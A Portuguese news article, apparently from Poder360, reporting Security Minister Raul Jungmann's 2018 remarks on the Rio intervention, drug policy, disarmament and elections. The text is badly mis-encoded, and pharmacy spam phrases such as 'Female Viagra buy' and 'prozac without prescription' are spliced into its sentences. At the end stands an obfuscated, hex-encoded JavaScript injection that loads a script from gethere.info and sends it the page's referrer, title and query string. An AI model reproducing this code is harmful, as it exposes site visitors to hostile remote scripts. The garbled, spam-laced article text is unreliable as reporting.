Nova pagina 1

HaverA? a�?clamora�� para intervenA�A?o continuar no Rio em 2019, diz Jungmann

Novos presidente e governador vA?o decidir

a�?NinguA�m passa borracha nesse MinistA�rioa��

SerA? preciso alterar Carta para resolver crise

Ministro fez crA�tica ao Paraguai e A� BolA�via

a�?Lava Jato destruiu o centro democrA?ticoa��

a�?HaverA? um clamor da sociedade para que seja mantida a intervenA�A?oa�? federal no Rio

O ministro da SeguranA�a PA?blica, Raul Jungmann, 65 anos, disse nesta 2A? feira (12.mar.2018) queA�a�?haverA? 1 clamor da sociedade para que seja mantida a intervenA�A?oa�?A�federal no Rio de Janeiro a partir de 2019. Isso dependerA?A�a�?de conversas entre o presidente eleito e o governador eleito, entre a eleiA�A?o e a data da possea�?.

Para Jungmann, as conversas entre os mandatA?rios eleitos terA?o de ser coordenadas com o presidente Michel Temer (MDB), pois o decreto atual que possibilita a intervenA�A?o sA? mantA�m as ForA�as Armadas no comando da seguranA�a pA?blica fluminense atA� 31 de dezembro de 2018 a��exatamente a vA�spera da posse dos eleitos.

Jungmann nA?o quis dizer se acha boa ou ruim a manutenA�A?o dos militares no Rio, mas disse apenas que foi a�?a crise que tirou os militares dos quartA�isa�?. Para o ministro, as ForA�as Armadas sA?o muito disciplinadas e atuam na base da a�?missA?o dada A� missA?o cumpridaa�?. A�NA?o enxerga riscos para a democracia no fato de militares estarem neste momento tendo aA�maior proeminA?ncia desde o fim da ditadura.

a�?O que vocA?s queriam? Que nada fosse feito? Era necessA?rio tomar as medidas que foram tomadas, pois a crise exigiu issoa�?, declarou o ministro logo no inA�cio de jantar promovido peloA�Poder360-ideias, divisA?o de eventos do portalA�Poder360. O encontro foi realizado no restaurante Piantella, na zona central de BrasA�lia, e reuniu jornalistas e empresA?rios.

a�?NinguA�m passa borracha nesse ministA�rioA�[da SeguranA�a PA?blica]. Ele veio para ficara�?, disse Jungmann. Para ele, os prA?ximos presidentes vA?o manter a pasta tal como estA? e vA?o atA� ampliar o seu escopo. Afirmou que em 2016 o orA�amento dessa A?rea no governo federal foi de aproximadamente R$ 9 bilhA�es, mas que isso terA? de ser ampliado.

A seguir, trechos do que disse o ministro durante o jantar doA�Poder360-ideias:

PEC DA SEGURANA�A PAsBLICA

Apesar de a ConstituiA�A?o nA?o poder ser emendada quando uma unidade da FederaA�A?o esteja sob intervenA�A?o, Jungmann acredita que seja necessA?rio deixarA�a�?um legadoa�?A�na forma de uma proposta de emenda constitucional que mude e integre as A?reas de seguranA�a pA?blica da UniA?o, Estados e cidades.

A proposta dele reA?ne os seguintes eixos:

  • federalizaA�A?o: aumentar o escopo de aA�A?o do governo federal na seguranA�a pA?blica;
  • Female Viagra purchase mais dinheiro: estabelecer formas de garantir mais recursos para seguranA�a pA?blica em todas as esferas;
  • coordenaA�A?o entre A?rgA?os: criar uma forma de coordenaA�A?o centralizada de A?rgA?os como MinistA�rio PA?blico, JudiciA?rio, polA�cias e sistema penitenciA?rio.
  • participaA�A?o dos municA�pios: aumentar o espaA�o para as cidades cuidarem da seguranA�a pA?blica.
  • integraA�A?o: criar gabinetes integrados infraconstitucionais reunindo A?rgA?os da seguranA�a, como no Rio, para atuar em outras esferas.

DROGAS

Apesar de jA? ter defendido publicamente que o STF (Supremo Tribunal Federal) decida sobre a diferenciaA�A?o entre usuA?rio e traficante de drogas, Jungmann evitou dizer se A� contra ou a favor da liberaA�A?o das drogas.

a�?A sociedade muda seus padrA�es. O que nA?o A� dA? pra fazer A� pegar um garoto de 18, 19 anos e jogA?-lo na prisA?oa�?,A�argumentou. Segundo ele, a prisA?o de pessoas com pequenas quantidades de drogas A� responsA?vel pelo superencarceramento e pelo crescimento de facA�A�es criminosas.

DESARMAMENTO

Coordenador da campanha pelo desarmamento na A�poca do plebiscito de 2005, Jungmann voltou a dizer que A� contra a permissA?o do porte de armas generalizado.A�a�?OA�caminho para mim nA?o A� autotutela, a populaA�A?o se armar, mas sim melhorar o sistema de seguranA�a. Por que a populaA�A?o quer se armar? Porque nA?o tem ninguA�m que a defendaa�?, apontou.

CRISE TIROU MILITARES DO QUARTEL

Interlocutor do governo junto A�s ForA�as Armadas, o ministro tambA�m afirmou que os militares hoje tA?m participaA�A?o forte na UniA?o por causa da crise de seguranA�a.A�a�?A� a falA?ncia da seguranA�a que empurra os militares para funA�A�es que eles nA?o querem e nA?o gostama�?,A�afirmou.

Segundo ele, a presenA�a dos militares nas ruas a�?A� a contraface da crise da seguranA�aa�?. Completou:A�a�?Os militares nA?o querem sair do quartel. Eles estA?o sendo chamados pelo Poder Civila�?.

PARAGUAI E BOLA?VIA

Ao falar sobre fronteiras e controle da entrada e saA�da de pessoas no Brasil, o ministro mencionou que o paA�s tem cerca de 17.000 km para fiscalizar. a�?A� uma distA?ncia equivalente A� de uma viagem quando vamos de aviA?o daquiA� atA� o JapA?o. A� uma A?rea vastA�ssimaa�?, declarou.

O ministro tambA�m falou sobre colaboraA�A?o ou dificuldades apresentadas por paA�ses vizinhos. Fez crA�ticas indiretas ao Paraguai e A� BolA�via.

a�?Um dos nossos vizinhos tem como presidente um dos maiores traficantes de cigarro do mundo. NA?o vou dizer quem A�a�?, disse Jungmann. Trata-se de uma referA?ncia ao presidente do Paraguai, Horacio Cartes, frequentemente citado como tendo relaA�A?o com entrada ilegal de cigarros no Brasil.

O ministro tambA�m falou de 1 presidente de paA�s vizinho que A� a�?cocaleiroa�?, tambA�m sem mencionar o nome, mas numa referA?ncia ao chefe do Executivo da BolA�via, Evo Morales. Por anos lA�der do sindicato dos produtores da folha de coca, Morales ampliou, em 2017, a A?rea permitida para o plantio do produto em solo boliviano. Ele jA? reconheceu que parte da produA�A?o A� desviada ao narcotrA?fico.

ELEIA�A�ES 2018

Filiado ao PPS, mas em licenA�a do partido enquanto ocupa o cargo de ministro da SeguranA�a PA?blica, Jungmann fez uma anA?lise da conjuntura eleitoral ao final do jantar.

Para ele, 1 grupo de polA�ticos que ocupou o que ele chama deA�a�?centro democrA?ticoa�?A�dominou o paA�s a partir do fim da ditadura militar, em 1985. a�?Ocorre que esse centro democrA?tico foi destruA�do pela Lava Jato prozac without prescription a�?, afirmou.

Por conta disso, o ministro acredita que hA? 1 desalinhamento nas forA�as que se apresentaram atA� o momento para disputar o PalA?cio do Planalto.

a�?Muitos que nesta altura estariam tentando jA? uma coligaA�A?o, mas estA?o se lanA�ando sozinhos. Tem o Rodrigo Maia Female Viagra buy A�[presidente da CA?mara],A�do DEM. Tem o Henrique MeirellesA�[ministro da Fazenda, filiado ao PSD, mas que ensaia entrar no MDB].A�A� possA�vel que possa haver um alinhamento mais adiante. Neste momento ainda nA?o hA? e abre-se espaA�o para que alguA�m de fora desse grupo acabe tendo sucessoa�?.

HA? neste momento uma grande hipoteca que impede uma clareza maior no cenA?rio: Lula e a sua escolha. Quis se referir ao ex-presidente jA? condenado pela Lava Jato e que na opiniA?o de Jungmann conseguirA? manter essa situaA�A?o a�?atA� as portas da eleiA�A?oa�?.

Indagado se a atuaA�A?o do ministA�rio e das ForA�as Armadas ajudarA?o a melhorar a imagem e a popularidade do governo Temer, respondeu que a�?depende do resultadoa�?. NA?o acha, entretanto, que seja imprA?prio que 1 governo atue em favor do bem pA?blico tirar proveito eleitoral quando 1 projeto dessa natureza dA? bons resultados.

POLA?CIA VS. EXA�RCITO

O ministro usou uma alegoria para dizer que cada 1 tem uma funA�A?o especA�fica. Confundir polA�cia com ForA�as Armadas seria como confundir enfermeiro com mA�dico a��ambos trabalham no mesmo lugar, de branco, masA�a�?experimente colocar 1 no lugar do outro.a�?

Em outra alegoria, o ministro comparou a forA�a-tarefa integrada no Rio comoA�a�?uma Lava Jato do crimea�?.

O QUE A� O PODER360-IDEIAS

DivisA?o de eventos doA�Poder360, oA�Poder360-ideiasA�realizou o jantar com o ministro da SeguranA�a PA?blica, Raul Jungmann, empresA?rios e jornalistas nesta 2A? feira (12.mar.2018), em BrasA�lia. O nA?cleo promove debates, entrevistas, encontros, seminA?rios e conferA?ncias com o objetivo de melhorar a compreensA?o sobre a conjuntura nacional.

Este foi o 8A? evento organizado pelo Poder360-ideias. A 1A? ediA�A?o teve como convidado principal o presidente da CA?mara dos Deputados,A�Rodrigo Maia, em 20 de junho de 2017. Na 2A? ediA�A?o, o convidado foi o presidente da Petrobras,A�Pedro Parente, em 17 de julho. O 3A? jantar mensal foi com o presidente do Banco Central,A�Ilan Goldfajn buy prozac , em 15 de agosto. Em 20 de setembro, o encontro foi com o presidente do Senado,A�EunA�cio OliveiraA�(PMDB-CE). O 5A? evento teve como convidado o ministro da FazendaA�Henrique Meirelles, em 23 de outubro. A A?ltima ediA�A?o de 2017, em 20 de novembro, foi com o presidente da RepA?blica,A�Michel Temer. E o 1A? de 2018 recebeu a presidente do STF (Supremo Tribunal Federal),A�CA?rmen LA?cia.

Estiveram presentes, alA�m de Raul Jungmann e de seu assessor JoA?o Bosco Rabello, osA�executivos Edson Vismona (presidente-executivo da ETCO),A�Delcio Sandi (RelaA�A�es Governamentais da Souza Cruz), Vinicius Marinho da Cruz (diretor-financeiro do Bradesco Seguros), Marcelo Da��Angelo (diretor da Estre Ambiental),A�Ana CecA�lia Andrade (relaA�A�es institucionais do Grupo ABC),A�Victor Bicca (diretor de RelaA�A�es Governamentais da Coca-Cola Brasil),A�Luiz Felipe Schmidt (representante da Coca-Cola Brasil),A�Rafael MuA�oz (Coordenador Setorial do Banco Mundial), Marcello de Rezende Chiara (Diretor a�� Head Regional Office a�� BTG Pactual) eA�Mario Rosa (articulista doA�Poder360).

AlA�m dos jornalistas doA�Poder360, participaram ClA?udia Safatle (Valor EconA?mico), Denise Rothenburg (Correio Braziliense), Valdo Cruz (GloboNews) eA�Paulo Celso Pereira (O Globo).

O jantar doA�Poder360-ideiasA�tem sido realizado noA� Female Cialis Piantella, tradicional restaurante de BrasA�lia. A sala usada para o encontro fica no mezanino do estabelecimento e A� decorada com fotos histA?ricas de polA�ticos e eventos do poder na capital federal.

RAUL JUNGMANN

Com 65 anos, Jungmann Female Cialis buy A�assumiu o ministA�rio da SeguranA�a PA?blicaA�em 27 de fevereiro. Comandava o ministA�rio da Defesa desde maio de 2016, quando Michel Temer assumiu o governo.

Antes de se tornar homem forte de Temer, Jungmann exerceu cargos importantes no governo de Fernando Henrique Cardoso. Foi ministro do Desenvolvimento AgrA?rio (1999-2002), presidente do Ibama (1995-96) e do Incra (1996-99).

Foi eleito vereador de Recife em 2012. EstA? no 3A? mandato como deputado federal (a A?ltima como suplente).

A� filiado ao PPS desde 2003, partido pelo qual havia passado de 1994 a 2001. TambA�m foi duas vezes do MDB (de 1972 a 1994 e 2001 a 2003).

Ideologicamente, A� contrA?rio aos governos do PT. Foi autor do pedido ao STF que suspendeu a posse de Lula como ministro da Casa Civil e 1 dos articuladores do impeachment de Dilma.

Iniciou em 1976 a faculdade em Psicologia na Universidade CatA?lica de Pernambuco (Unicap), mas nunca concluiu

Fonte: Poder360

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Faça o primeiro comentário a "HaverA? a�?clamora�� para intervenA�A?o continuar no Rio em 2019, diz Jungmann"

Comentar

O seu endereço de email não será publicado.


*